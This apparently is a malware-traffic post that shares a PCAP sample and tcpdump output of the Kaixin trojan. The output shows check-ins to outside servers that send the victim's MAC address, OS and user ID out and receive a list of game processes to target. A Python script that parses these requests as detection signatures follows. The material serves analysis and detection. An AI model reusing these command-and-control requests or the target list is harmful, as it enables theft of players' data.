Kaixin Malware Trojan Traffic Analysis Download PCAP Sample

January 29, 2016

Download Kaixin PCAP sample: kaixin.pcap

2015-01-02 19:50:37.708348 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [S], seq 75942973, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2015-01-02 19:50:37.882144 IP 119.147.137.128.80 > 192.168.138.158.1042: Flags [S.], seq 954914802, ack 75942974, win 16384, options [mss 1260,nop,nop,sackOK], length 0
2015-01-02 19:50:37.882622 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [.], ack 1, win 64240, length 0
2015-01-02 19:50:37.883125 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [P.], seq 1:459, ack 1, win 64240, length 458: HTTP: POST /tj.asp HTTP/1.1
POST /tj.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.568bar.com/tj.asp
Accept-Language: zh-cn
Content-Length: 16
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.568bar.com
Cache-Control: no-cache

yz=1314&uz=1&jc=
2015-01-02 19:50:38.059030 IP 119.147.137.128.80 > 192.168.138.158.1042: Flags [P.], seq 1:624, ack 459, win 65077, length 623: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Sat, 03 Jan 2015 00:51:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 380
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAASBDBQB=BBDKMCDDPEKECFACGNLLOAFO; path=/
Cache-control: private

dnf.exe|lolclient.exe|crossfire.exe|soul.exe|asktao.mod|wow.exe|wow-64.exe|jfzr.exe|launcher.exe|asura.exe|elementclient.exe|qqhxsj.exe|cstrike-online.exe|game.exe|aion.bin|dungeonstriker.exe|zhengtu2.dat|qqsg.exe|gameplaza.exe|gtsaloon.exe|fifazf.exe|dragonnest.exe|dj2.exe|jx3client.exe|tty3d.exe|xxzshell.exe|qqhxgame.exe|tklobby.exe|<br>http://www.sina.com|http://www.sina.com
2015-01-02 19:50:38.059634 IP 192.168.138.158.1042 > 119.147.137.128.80: Flags [R.], seq 459, ack 624, win 0, length 0
2015-01-02 19:50:38.393027 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [S], seq 1143477102, win 64240, options [mss 1460,nop,nop,sackOK], length 0
2015-01-02 19:50:38.578643 IP 119.147.137.27.80 > 192.168.138.158.1043: Flags [S.], seq 3474551616, ack 1143477103, win 16384, options [mss 1260,nop,nop,sackOK], length 0
2015-01-02 19:50:38.579027 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [.], ack 1, win 64240, length 0
2015-01-02 19:50:38.579445 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [P.], seq 1:555, ack 1, win 64240, length 554: HTTP: GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack HTTP/1.1
GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.92liu.com/count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows XP&iellq=IE:6.0.2900.5512&mrllq=iexplore&userid=jack
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
Host: www.92liu.com
Cache-Control: no-cache
2015-01-02 19:50:38.846793 IP 119.147.137.27.80 > 192.168.138.158.1043: Flags [P.], seq 1:263, ack 555, win 64981, length 262: HTTP: HTTP/1.1 200 OK
HTTP/1.1 200 OK
Date: Sat, 03 Jan 2015 00:51:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 20
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSCAATQTR=NDGIGFGDAIGABFJBDDJBNDCJ; path=/
Cache-control: private

upData Update OK<br>
2015-01-02 19:50:38.847467 IP 192.168.138.158.1043 > 119.147.137.27.80: Flags [R.], seq 555, ack 263, win 0, length 0
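As an added example (not part of the original post), the following Python script parses the two check-in requests seen in the capture above: it decodes the form fields of the POST to /tj.asp and the query parameters of the GET to /count.asp, matches each request against the exact field set the capture shows for that path, normalises the unpadded MAC value, and splits the pipe-delimited process list the /tj.asp response returns. The rule names, the shortened sample strings and all helper functions are this example's own assumptions, not code from the post.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed sample input: request lines, POST body and response body copied
# from the capture above (the process list is shortened to its first entries).
REQUESTS = [
    ("POST /tj.asp HTTP/1.1", "yz=1314&uz=1&jc="),
    ("GET /count.asp?mac=8-0-27-8F-E3-EB&ComPut=Windows%20XP&iellq=IE:6.0.2900.5512"
     "&mrllq=iexplore&userid=jack HTTP/1.1", ""),
]
TJ_RESPONSE = ("dnf.exe|lolclient.exe|crossfire.exe|soul.exe|asktao.mod|wow.exe|"
               "<br>http://www.sina.com|http://www.sina.com")

# Field sets observed per path in the capture (hypothetical detection rules).
SIGNATURES = {
    "/tj.asp": {"yz", "uz", "jc"},
    "/count.asp": {"mac", "ComPut", "iellq", "mrllq", "userid"},
}

def parse_request(line, body=""):
    """Split an HTTP request line into method, path and the decoded parameters
    carried in the query string (GET) or in the form body (POST)."""
    method, target, _version = line.split(" ", 2)
    parts = urlsplit(target)
    raw = parts.query if method == "GET" else body
    params = {k: v[0] for k, v in parse_qs(raw, keep_blank_values=True).items()}
    return {"method": method, "path": parts.path, "params": params}

def classify(req):
    """Return the matching check-in name, or None when the request does not
    carry exactly the field set seen for that path in the capture."""
    expected = SIGNATURES.get(req["path"])
    if expected is not None and set(req["params"]) == expected:
        return "kaixin-checkin " + req["path"]
    return None

def normalize_mac(value):
    """Turn the unpadded '8-0-27-8F-E3-EB' form into '08:00:27:8F:E3:EB'."""
    return ":".join(p.upper().zfill(2) for p in value.split("-"))

def parse_target_list(body):
    """Split the tj.asp response body: '|'-separated process names, then a
    '<br>' separator, then '|'-separated URLs."""
    procs, _, urls = body.partition("<br>")
    return {"processes": [p for p in procs.split("|") if p],
            "urls": [u for u in urls.split("|") if u]}

if __name__ == "__main__":
    for line, body in REQUESTS:
        req = parse_request(line, body)
        print(classify(req), req["params"])
    print(parse_target_list(TJ_RESPONSE))
```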
